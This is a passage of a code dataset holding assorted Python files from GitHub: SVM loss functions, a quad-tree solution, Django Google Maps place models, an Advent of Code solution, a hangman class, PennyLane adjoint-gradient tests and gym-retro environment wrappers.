y_test[x])\n\n\n\"\"\"STEP12\"\"\"\n##Plotting the graph\n\n\"\"\"This p below is the x axis of the graph (which means we can pick any values from the STEP2 except\n \"G3\" becasue that's thats our lable or our Y axis of the graph) \"\"\"\n\np = 'G1'\nstyle.use(\"ggplot\")\npyplot.scatter(data[p], data['G3'])\npyplot.xlabel(p)\npyplot.ylabel(\"Final Grade\")\npyplot.show()\n","repo_name":"rakesh-050791/machine_learning_practicing","sub_path":"LinearRegressionWithPickleExample.py","file_name":"LinearRegressionWithPickleExample.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27816462854","text":"import numpy as np\nfrom random import shuffle\n\ndef svm_loss_naive(W, X, y, reg):\n\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n # compute the loss and the gradient\n num_classes = W.shape[0]\n num_train = X.shape[1]\n loss = 0.0\n for i in xrange(num_train):\n scores = W.dot(X[:, i])\n correct_class_score = scores[y[i]]\n for j in xrange(num_classes):\n if j == y[i]:\n continue\n margin = scores[j] - correct_class_score + 1 # note delta = 1\n if margin > 0:\n loss += margin\n dW[y[i], :] += -X[:, i]\n dW[j, :] += X[:, i]\n loss /= num_train\n\n loss += 0.5 * reg * np.sum(W * W)\n dW /= num_train\n dW +=reg * W\n return loss, dW\n\n\ndef svm_loss_vectorized(W, X, y, reg):\n\n loss = 0.0\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n num_classes = W.shape[0]\n num_train = X.shape[1]\n loss = 0.0\n scores_function=W.dot(X)\n col=np.arange(0,num_train)\n margins=np.maximum(0,(scores_function-scores_function[y,col])+1)\n margins[y,col]=0\n loss=np.sum(margins)\n loss/=num_train\n loss+=0.5*reg*np.sum(W*W)\n\n num_pos = np.sum(margins > 0, axis=0)\n dscores = np.zeros(scores_function.shape)\n dscores[margins > 0] = 1\n dscores[y, range(num_train)] = -num_pos\n dW = dscores.dot(X.T) / num_train + reg * W\n\n return loss, dW\n","repo_name":"coolxid/ML-Classifiers","sub_path":"linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"969162562","text":"\"\"\"\n# Definition for a QuadTree node.\nclass Node:\n def __init__(self, val, isLeaf, topLeft, topRight, bottomLeft, bottomRight):\n self.val = val\n self.isLeaf = isLeaf\n self.topLeft = topLeft\n self.topRight = topRight\n self.bottomLeft = bottomLeft\n self.bottomRight = bottomRight\n\"\"\"\n\nclass Solution:\n def construct(self, grid: List[List[int]]) -> 'Node':\n def constructTree(startX, endX, startY, endY):\n if startX > endX or startY > endY: return\n\n if startX == endX and startY == endY: return Node(grid[startY][startX], True)\n\n midX, midY = (startX + endX) // 2, (startY + endY) // 2\n \n topLeft = constructTree(startX, midX, startY, midY)\n topRight = constructTree(midX + 1, endX, startY, midY)\n bottomLeft = constructTree(startX, midX, midY + 1, endY)\n bottomRight = constructTree(midX + 1, endX, midY + 1, endY)\n\n children = [topLeft, topRight, bottomLeft, bottomRight]\n\n if all([node.isLeaf and node.val == 0 for node in children]):\n return Node(0, True)\n elif all([node.isLeaf and node.val == 1 for node in children]):\n return Node(1, True)\n else:\n return Node(1, False, topLeft, topRight, bottomLeft, bottomRight)\n \n n = len(grid)\n\n return constructTree(0, n - 1, 0, n - 1)\n","repo_name":"mathewhany/leetcode-solutions","sub_path":"0772-construct-quad-tree/0772-construct-quad-tree.py","file_name":"0772-construct-quad-tree.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36038727615","text":"from . import conf\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\n# from django.utils.encoding import smart_str\nfrom gmapsmarkers.fields import GmapsField, GeotypeField\nfrom gmaps import Geocoding\nfrom gmaps.errors import NoResults, RequestDenied, InvalidRequest, RateLimitExceeded\nfrom utils import country_to_continent, CONTINENTS\n\nimport json\n\nALLOWED_TYPES = settings.GMAPS_PLACES_ALLOWED_TYPES\nURL_TYPES = settings.GMAPS_PLACES_URL_TYPES\nGMAPS_DEFAULT_CLIENT_PARAMS = {\n 'sensor': True,\n 'use_https': True,\n 'api_key': settings.GMAPS_API_KEY,\n}\nGMAPS_DEFAULT_GEOCODE_PARAMS = {\n 'language': settings.GMAPS_LANGUAGE_CODE,\n}\n\ngmaps_api = Geocoding(**GMAPS_DEFAULT_CLIENT_PARAMS)\n\n\nclass GmapsItem(models.Model):\n geo_type = models.CharField(max_length=100)\n slug = models.SlugField()\n name = models.CharField(max_length=255)\n short_name = models.CharField(max_length=255, blank=True)\n # geocode = models.CharField(max_length=255, blank=True)\n response_json = models.TextField(blank=True)\n use_viewport = models.BooleanField(default=True)\n url = models.CharField(max_length=255, blank=True)\n custom_zoom = models.PositiveSmallIntegerField(\n blank=True, null=True, choices=[(x, x) for x in xrange(1, 22)])\n\n @property\n def geo_address(self):\n if self.geo_type in (u\"continent\", u\"country\"):\n return self.name\n name = self.short_name if self.short_name != \"\" else self.name\n geo_address = (\", \".join((self.url).split(\"/\")[2:-1]))\\\n .strip(\" -,\") + u\", {}\".format(name)\n return geo_address\n\n @property\n def geometry_latlng(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n lat = results['geometry']['location']['lat']\n lng = results['geometry']['location']['lng']\n return u\"{},{}\".format(lat, lng)\n\n @property\n def geometry_bounds(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n try:\n bounds = results['geometry']['bounds']\n except KeyError:\n return None\n else:\n return json.dumps(bounds)\n # return u\"{}\".format(bounds,)\n\n @property\n def geometry_viewport(self):\n try:\n results = (json.loads(self.response_json))[0]\n except (ValueError, KeyError):\n return None\n else:\n viewport = results['geometry']['viewport']\n return json.dumps(viewport)\n\n def get_response_json(self):\n result = gmaps_api.geocode(self.geo_address, **GMAPS_DEFAULT_GEOCODE_PARAMS)\n if result:\n return json.dumps(result)\n else:\n return ''\n\n def get_short_name(self):\n if self.response_json is None or self.response_json == \"\":\n return \"\"\n response_json = (json.loads(self.response_json))[0]\n for add in response_json['address_components']:\n if self.geo_type in add['types']:\n return add['short_name']\n return \"\"\n\n def __unicode__(self):\n return u\"{}({})\".format(self.slug, self.geo_type)\n\n def save(self, *args, **kwargs):\n if not self.response_json:\n self.response_json = self.get_response_json()\n self.short_name = self.get_short_name()\n\n super(GmapsItem, self).save(*args, **kwargs)\n\n\nclass GmapsPlace(models.Model):\n country = models.CharField(max_length=255, blank=True)\n administrative_area_level_1 = models.CharField(max_length=255, blank=True)\n administrative_area_level_2 = models.CharField(max_length=255, blank=True)\n administrative_area_level_3 = models.CharField(max_length=255, blank=True)\n administrative_area_level_4 = models.CharField(max_length=255, blank=True)\n administrative_area_level_5 = models.CharField(max_length=255, blank=True)\n locality = models.CharField(max_length=255, blank=True)\n sublocality = models.CharField(max_length=255, blank=True)\n neighborhood = models.CharField(max_length=255, blank=True)\n premise = models.CharField(max_length=255, blank=True)\n subpremise = models.CharField(max_length=255, blank=True)\n postal_code = models.CharField(max_length=255, blank=True)\n natural_feature = models.CharField(max_length=255, blank=True)\n airport = models.CharField(max_length=255, blank=True)\n park = models.CharField(max_length=255, blank=True)\n street_address = models.CharField(max_length=255, blank=True)\n street_number = models.CharField(max_length=255, blank=True)\n route = models.CharField(max_length=255, blank=True)\n intersection = models.CharField(max_length=255, blank=True)\n address = GmapsField(plugin_options={\n 'geocode_field': 'geocode', 'type_field': 'geo_type',\n 'allowed_types': ALLOWED_TYPES},\n select2_options={'width': '300px'},\n help_text=(u\"Type the address you're looking for and click \"\n u\"on the red marker to select it.\"))\n geocode = models.CharField(max_length=255, blank=True)\n geo_type = GeotypeField(blank=True)\n\n continent_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_continent_set', null=True, blank=True)\n country_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_country_set', null=True, blank=True)\n administrative_area_level_1_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal1_set', null=True, blank=True)\n administrative_area_level_2_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal2_set', null=True, blank=True)\n administrative_area_level_3_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal3_set', null=True, blank=True)\n administrative_area_level_4_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal4_set', null=True, blank=True)\n administrative_area_level_5_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_aal5_set', null=True, blank=True)\n locality_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_locality_set', null=True, blank=True)\n sublocality_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_sublocality_set', null=True, blank=True)\n neighborhood_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_neighborhood_set', null=True, blank=True)\n postal_code_item = models.ForeignKey(\n GmapsItem, on_delete=models.SET_NULL,\n related_name='gmapsplace_postal_code_set', null=True, blank=True)\n\n @property\n def country_code(self):\n if self.country_item:\n return self.country_item.short_name\n else:\n return \"\"\n\n def process_address(self):\n try:\n result = gmaps_api.geocode(self.address, **GMAPS_DEFAULT_GEOCODE_PARAMS)\n except (NoResults, RequestDenied, InvalidRequest, RateLimitExceeded) as e:\n raise e\n else:\n lat = result[0]['geometry']['location']['lat']\n lng = result[0]['geometry']['location']['lng']\n self.geocode = u\"{},{}\".format(lat, lng)\n formatted_address = result[0]['formatted_address']\n self.address = formatted_address\n address_components = result[0]['address_components']\n set_types = set(ALLOWED_TYPES)\n for add in address_components:\n inters = set_types.intersection(set(add['types']))\n if inters:\n for t in inters:\n setattr(self, t, u\"{}\".format(add['long_name']))\n self.save()\n\n def __unicode__(self):\n return u'{}'.format(self.address)\n\n def save(self, *args, **kwargs):\n url = ''\n if self.country in (None, u\"\"):\n if slugify(self.address.lower()) in [x[0] for x in CONTINENTS]:\n continent = self.address\n else:\n continent = u'undefined'\n else:\n continent = country_to_continent(self.country)\n if continent is None:\n raise NotImplementedError(\n (u\"The Country you are looking for for the current \"\n u\"address '{}' is not in our list\".format(self.address)))\n\n url += '/{}'.format(slugify(continent))\n gmap_ent, create = GmapsItem.objects.get_or_create(\n geo_type='continent', name=continent,\n slug=slugify(continent), url=url)\n self.continent_item = gmap_ent\n # set all the other types\n for tp in URL_TYPES:\n curr_type = getattr(self, tp)\n url_to_add = slugify(curr_type) if curr_type not in (None, '')\\\n else u\"-\"\n url += '/{}'.format(url_to_add)\n if curr_type:\n geocode = self.geocode if self.geo_type == tp else None\n gmap_ent, create = GmapsItem.objects.get_or_create(\n geo_type=tp, name=curr_type,\n slug=slugify(curr_type), url=url)\n gmap_ent.geocode = geocode\n gmap_ent.save()\n setattr(self, u\"{}_item\".format(tp), gmap_ent)\n super(GmapsPlace, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('country', 'address')\n","repo_name":"leotop/twentytab-gmaps-places","sub_path":"gmaps_places/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"40843713041","text":"import numpy as np\nfrom collections import deque\n\nfilename = \"input.txt\"\n\nwith open(filename, \"r\") as f:\n lines = [str(line).strip() for line in f.readlines()]\n\nscoring = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137,\n}\npair = {\n ')': '(',\n ']': '[',\n '}': '{',\n '>': '<',\n}\nscoring2 = {\n '(': 1,\n '[': 2,\n '{': 3,\n '<': 4,\n}\n\ndef parse_line(line):\n q = deque()\n for c in line:\n if c in pair:\n top = q.pop()\n if pair[c] != top:\n return (True, scoring[c])\n else:\n q.append(c)\n\n score2 = 0\n while len(q):\n c = q.pop()\n score2 *= 5\n score2 += scoring2[c]\n\n return (False, score2)\n\nresult = 0\nscores = []\nfor line in lines:\n (part1, r) = parse_line(line)\n if part1:\n result += r\n else:\n scores.append(r)\n\nresult2 = np.median(scores)\n\n\nprint(f\"Part 1: {result}\")\nprint(f\"Part 2: {result2}\")\n\n","repo_name":"alexTsaptsinos/AdventOfCode","sub_path":"aoc-2021/day10/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31503471008","text":"from HangmanLetter import HangmanLetter\n\nfrom hangman_utils import set_word\n\n\nclass HangmanWord:\n word_file = 'usa.txt'\n\n def __init__(self):\n self.word: list[HangmanLetter] = set_word(HangmanWord.word_file)\n self.guessed = False\n\n def get_word_space(self) -> str:\n word = []\n for letter in self.word:\n word.append(letter.display_letter_space())\n\n return ' '.join(map(str, word))\n\n def get_word(self) -> str:\n word = []\n for letter in self.word:\n word.append(letter.display_letter())\n\n return ' '.join(map(str, word))\n\n def update_word(self, letter) -> bool:\n new_answer = []\n correct_letter = False\n # Go through each letter and set to true\n for hang_letter in self.word:\n if hang_letter.letter == letter:\n hang_letter.show = True\n correct_letter = True\n new_answer.append(hang_letter)\n self.word = new_answer\n self.set_guessed()\n return correct_letter\n\n def count_remaining(self) -> int:\n count = 0\n for letter in self.word:\n if not letter.show:\n count += 1\n return count\n\n def count_total(self) -> int:\n return len(self.word)\n\n def set_guessed(self):\n if self.count_remaining() == 0:\n self.guessed = True\n","repo_name":"kenreitz27/hangman","sub_path":"src/HangmanWord.py","file_name":"HangmanWord.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31504923522","text":"import pytest\n\nimport pennylane as qml\nfrom pennylane import numpy as np\n\n\nclass TestAdjointJacobian:\n \"\"\"Tests for the ``adjoint_jacobian`` method\"\"\"\n\n @pytest.fixture\n def dev(self):\n \"\"\"Fixture that creates a device with two wires.\"\"\"\n return qml.device(\"default.qubit.legacy\", wires=2)\n\n def test_not_expval(self, dev):\n \"\"\"Test if a QuantumFunctionError is raised for a tape with measurements that are not\n expectation values\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.1, wires=0)\n qml.var(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(qml.QuantumFunctionError, match=\"Adjoint differentiation method does\"):\n dev.adjoint_jacobian(tape)\n\n def test_finite_shots_warns(self):\n \"\"\"Tests warning raised when finite shots specified\"\"\"\n\n dev = qml.device(\"default.qubit.legacy\", wires=1, shots=10)\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.warns(\n UserWarning, match=\"Requested adjoint differentiation to be computed with finite shots.\"\n ):\n dev.adjoint_jacobian(tape)\n\n def test_hamiltonian_error(self, dev):\n \"\"\"Test that error is raised for qml.Hamiltonian\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(\n qml.Hamiltonian(\n [np.array(-0.05), np.array(0.17)],\n [qml.PauliX(0), qml.PauliZ(0)],\n )\n )\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(\n qml.QuantumFunctionError,\n match=\"Adjoint differentiation method does not support Hamiltonian observables\",\n ):\n dev.adjoint_jacobian(tape)\n\n def test_unsupported_op(self, dev):\n \"\"\"Test if a QuantumFunctionError is raised for an unsupported operation, i.e.,\n multi-parameter operations that are not qml.Rot\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.CRot(0.1, 0.2, 0.3, wires=[0, 1])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n with pytest.raises(qml.QuantumFunctionError, match=\"The CRot operation is not\"):\n dev.adjoint_jacobian(tape)\n\n def test_trainable_hermitian_warns(self):\n \"\"\"Test attempting to compute the gradient of a tape that obtains the\n expectation value of a Hermitian operator emits a warning if the\n parameters to Hermitian are trainable.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n\n mx = qml.matrix(qml.PauliX(0) @ qml.PauliY(2))\n with qml.queuing.AnnotatedQueue() as q:\n qml.expval(qml.Hermitian(mx, wires=[0, 2]))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0}\n with pytest.warns(\n UserWarning, match=\"Differentiating with respect to the input parameters of Hermitian\"\n ):\n dev.adjoint_jacobian(tape)\n\n @pytest.mark.autograd\n @pytest.mark.parametrize(\"theta\", np.linspace(-2 * np.pi, 2 * np.pi, 7))\n @pytest.mark.parametrize(\"G\", [qml.RX, qml.RY, qml.RZ])\n def test_pauli_rotation_gradient(self, G, theta, tol, dev):\n \"\"\"Tests that the automatic gradients of Pauli rotations are correct.\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.StatePrep(np.array([1.0, -1.0], requires_grad=False) / np.sqrt(2), wires=0)\n G(theta, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1}\n\n calculated_val = dev.adjoint_jacobian(tape)\n\n # compare to finite differences\n tapes, fn = qml.gradients.finite_diff(tape)\n numeric_val = fn(qml.execute(tapes, dev, None))\n\n assert isinstance(calculated_val, np.ndarray)\n assert calculated_val.shape == ()\n assert np.allclose(calculated_val, numeric_val, atol=tol, rtol=0)\n\n @pytest.mark.autograd\n @pytest.mark.parametrize(\"theta\", np.linspace(-2 * np.pi, 2 * np.pi, 7))\n def test_Rot_gradient(self, theta, tol, dev):\n \"\"\"Tests that the device gradient of an arbitrary Euler-angle-parameterized gate is\n correct.\"\"\"\n params = np.array([theta, theta**3, np.sqrt(2) * theta])\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.StatePrep(np.array([1.0, -1.0], requires_grad=False) / np.sqrt(2), wires=0)\n qml.Rot(*params, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n calculated_val = dev.adjoint_jacobian(tape)\n\n # compare to finite differences\n tapes, fn = qml.gradients.finite_diff(tape)\n numeric_val = fn(qml.execute(tapes, dev, None))\n\n assert isinstance(calculated_val, tuple)\n assert len(calculated_val) == 3\n assert all(isinstance(val, np.ndarray) and val.shape == () for val in calculated_val)\n assert np.allclose(calculated_val, numeric_val, atol=tol, rtol=0)\n\n def test_ry_gradient(self, tol, dev):\n \"\"\"Test that the gradient of the RY gate matches the exact analytic formula.\"\"\"\n\n par = 0.23\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(par, wires=[0])\n qml.expval(qml.PauliX(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0}\n\n # gradients\n exact = np.cos(par)\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n grad_A = dev.adjoint_jacobian(tape)\n\n # different methods must agree\n assert isinstance(grad_A, np.ndarray) and grad_A.shape == ()\n assert np.allclose(grad_F, exact, atol=tol, rtol=0)\n assert np.allclose(grad_A, exact, atol=tol, rtol=0)\n\n def test_rx_gradient(self, tol, dev):\n \"\"\"Test that the gradient of the RX gate matches the known formula.\"\"\"\n a = 0.7418\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(a, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n # circuit jacobians\n dev_jacobian = dev.adjoint_jacobian(tape)\n expected_jacobian = -np.sin(a)\n\n assert isinstance(dev_jacobian, np.ndarray)\n assert dev_jacobian.shape == ()\n assert np.allclose(dev_jacobian, expected_jacobian, atol=tol, rtol=0)\n\n def test_multiple_rx_gradient(self, tol):\n \"\"\"Tests that the gradient of multiple RX gates in a circuit yields the correct result.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n params = np.array([np.pi, np.pi / 2, np.pi / 3])\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(params[0], wires=0)\n qml.RX(params[1], wires=1)\n qml.RX(params[2], wires=2)\n\n for idx in range(3):\n qml.expval(qml.PauliZ(idx))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n # circuit jacobians\n dev_jacobian = dev.adjoint_jacobian(tape)\n assert isinstance(dev_jacobian, tuple)\n assert len(dev_jacobian) == 3\n assert all(isinstance(jac, tuple) and len(jac) == 3 for jac in dev_jacobian)\n assert all(all(isinstance(j, np.ndarray) for j in jac) for jac in dev_jacobian)\n\n expected_jacobian = -np.diag(np.sin(params))\n assert np.allclose(dev_jacobian, expected_jacobian, atol=tol, rtol=0)\n\n ops = {qml.RX, qml.RY, qml.RZ, qml.PhaseShift, qml.CRX, qml.CRY, qml.CRZ, qml.Rot}\n\n @pytest.mark.autograd\n @pytest.mark.parametrize(\"obs\", [qml.PauliY])\n @pytest.mark.parametrize(\n \"op\", [qml.RX(0.4, wires=0), qml.CRZ(1.0, wires=[0, 1]), qml.Rot(0.2, -0.1, 0.2, wires=0)]\n )\n def test_gradients(self, op, obs, tol, dev):\n \"\"\"Tests that the gradients of circuits match between the finite difference and device\n methods.\"\"\"\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.Hadamard(wires=0)\n qml.RX(0.543, wires=0)\n qml.CNOT(wires=[0, 1])\n\n qml.apply(op)\n\n qml.Rot(1.3, -2.3, 0.5, wires=[0])\n qml.RZ(-0.5, wires=0)\n qml.adjoint(qml.RY(0.5, wires=1))\n qml.CNOT(wires=[0, 1])\n\n qml.expval(obs(wires=0))\n qml.expval(qml.PauliZ(wires=1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = set(range(1, 1 + op.num_params))\n\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n grad_D = dev.adjoint_jacobian(tape)\n\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == 2\n\n if op.num_params == 1:\n assert all(isinstance(g, np.ndarray) and g.shape == () for g in grad_D)\n else:\n assert all(isinstance(g, tuple) and len(g) == op.num_params for g in grad_D)\n assert all(all(isinstance(_g, np.ndarray) for _g in g) for g in grad_D)\n\n assert np.allclose(grad_D, grad_F, atol=tol, rtol=0)\n\n @pytest.mark.autograd\n def test_gradient_gate_with_multiple_parameters(self, tol, dev):\n \"\"\"Tests that gates with multiple free parameters yield correct gradients.\"\"\"\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n grad_D = dev.adjoint_jacobian(tape)\n tapes, fn = qml.gradients.finite_diff(tape)\n grad_F = fn(qml.execute(tapes, dev, None))\n\n # gradient has the correct shape and every element is nonzero\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == 3\n assert all(isinstance(g, np.ndarray) for g in grad_D)\n\n assert np.count_nonzero(grad_D) == 3\n # the different methods agree\n assert np.allclose(grad_D, grad_F, atol=tol, rtol=0)\n\n def test_use_device_state(self, tol, dev):\n \"\"\"Tests that when using the device state, the correct answer is still returned.\"\"\"\n\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n dM1 = dev.adjoint_jacobian(tape)\n\n qml.execute([tape], dev, None)\n dM2 = dev.adjoint_jacobian(tape, use_device_state=True)\n\n assert np.allclose(dM1, dM2, atol=tol, rtol=0)\n\n # pylint: disable=protected-access\n def test_provide_starting_state(self, tol, dev):\n \"\"\"Tests provides correct answer when provided starting state.\"\"\"\n x, y, z = [0.5, 0.3, -0.7]\n\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(0.4, wires=[0])\n qml.Rot(x, y, z, wires=[0])\n qml.RY(-0.2, wires=[0])\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n dM1 = dev.adjoint_jacobian(tape)\n\n qml.execute([tape], dev, None)\n dM2 = dev.adjoint_jacobian(tape, starting_state=dev._pre_rotated_state)\n\n assert np.allclose(dM1, dM2, atol=tol, rtol=0)\n\n def test_gradient_of_tape_with_hermitian(self, tol):\n \"\"\"Test that computing the gradient of a tape that obtains the\n expectation value of a Hermitian operator works correctly.\"\"\"\n dev = qml.device(\"default.qubit.legacy\", wires=3)\n\n a, b, c = [0.5, 0.3, -0.7]\n\n def ansatz(a, b, c):\n qml.RX(a, wires=0)\n qml.RX(b, wires=1)\n qml.RX(c, wires=2)\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n\n mx = qml.matrix(qml.PauliX(0) @ qml.PauliY(2))\n with qml.queuing.AnnotatedQueue() as q:\n ansatz(a, b, c)\n qml.RX(a, wires=0)\n qml.expval(qml.Hermitian(mx, wires=[0, 2]))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {0, 1, 2}\n res = dev.adjoint_jacobian(tape)\n\n expected = [\n np.cos(a) * np.sin(b) * np.sin(c),\n np.cos(b) * np.sin(a) * np.sin(c),\n np.cos(c) * np.sin(b) * np.sin(a),\n ]\n assert np.allclose(res, expected, atol=tol, rtol=0)\n\n def test_multi_return(self, dev):\n \"\"\"Test that the gradients of multiple observables are correct\"\"\"\n\n x = np.array([0.6, 0.8, 1.0])\n\n ops = [\n qml.Hadamard(wires=0),\n qml.RX(0.543, wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.Rot(x[0], x[1], x[2], wires=0),\n qml.Rot(1.3, -2.3, 0.5, wires=[0]),\n qml.RZ(-0.5, wires=0),\n qml.RY(0.5, wires=1),\n qml.CNOT(wires=[0, 1]),\n ]\n\n observables = [\n qml.PauliX(0),\n qml.PauliX(0) @ qml.PauliZ(1),\n qml.Projector([0], wires=0),\n qml.Hermitian([[0, 1], [1, 0]], wires=1),\n ]\n\n with qml.queuing.AnnotatedQueue() as q:\n for op in ops:\n qml.apply(op)\n\n for ob in observables:\n qml.expval(ob)\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape.trainable_params = {1, 2, 3}\n\n grad_D = dev.adjoint_jacobian(tape)\n\n # check that the type and format of the adjoint jacobian is correct\n assert isinstance(grad_D, tuple)\n assert len(grad_D) == len(observables)\n assert all(isinstance(g, tuple) for g in grad_D)\n assert all(len(g) == 3 for g in grad_D)\n assert all(all(isinstance(_g, np.ndarray) for _g in g) for g in grad_D)\n\n # check the results against individually executed tapes\n for i, ob in enumerate(observables):\n with qml.queuing.AnnotatedQueue() as q_indiv_tape:\n for op in ops:\n qml.apply(op)\n\n qml.expval(ob)\n\n indiv_tape = qml.tape.QuantumScript.from_queue(q_indiv_tape)\n indiv_tape.trainable_params = {1, 2, 3}\n\n expected = dev.adjoint_jacobian(indiv_tape)\n\n assert isinstance(expected, tuple)\n assert len(expected) == 3\n assert all(isinstance(g, np.ndarray) for g in expected)\n\n assert np.allclose(grad_D[i], expected)\n","repo_name":"PennyLaneAI/pennylane","sub_path":"tests/gradients/core/test_adjoint_diff.py","file_name":"test_adjoint_diff.py","file_ext":"py","file_size_in_byte":14691,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"40582298840","text":"from collections import deque\nfrom gym import spaces\nfrom retro import make\nimport cv2, gym, numpy as np, utils\n\n\nclass ActionsDiscretizer(gym.ActionWrapper):\n def __init__(self, env, actions):\n super(ActionsDiscretizer, self).__init__(env)\n buttons = env.buttons\n self._actions = []\n for action in actions:\n arr = np.array([False]*len(buttons))\n for button in action:\n arr[buttons.index(button)] = True\n self._actions.append(arr)\n self.action_space = spaces.Discrete(len(self._actions))\n\n def action(self, action):\n return self._actions[action].copy()\n\nclass ProcessFrame(gym.ObservationWrapper):\n def __init__(self, env, width=84, height=84):\n super(ProcessFrame, self).__init__(env)\n self.observation_space = spaces.Box(low=0, high=255, shape=(1, width, height))\n self.shape = width, height\n\n def observation(self, frame):\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame, self.shape, interpolation=cv2.INTER_AREA)\n frame = frame[None, :, :]\n return frame\n\nclass AllowBacktracking(gym.Wrapper):\n def __init__(self, env, width=84, height=84, skip=4):\n super(AllowBacktracking, self).__init__(env)\n self.observation_space = spaces.Box(low=0, high=255, shape=(4, width, height))\n self.states = deque(np.zeros((4, width, height), dtype=np.float32), maxlen=4)\n self.score, self.skip = 0, skip\n\n def step(self, action):\n total_reward, state_buffer = 0, deque(maxlen=2)\n for _ in range(self.skip):\n state, reward, done, info = self.env.step(action)\n total_reward += reward + (info[\"score\"]-self.score) * 0.5\n self.score = info[\"score\"]\n state_buffer.append(state)\n if done: break\n else:\n _, _, done, _ = self.env.step(0)\n self.states.append(np.max(np.concatenate(state_buffer, 0), 0))\n return np.array(self.states)[None, :, :, :].astype(np.float32), total_reward, done, info\n\n def reset(self, **kwargs):\n self.score, state = 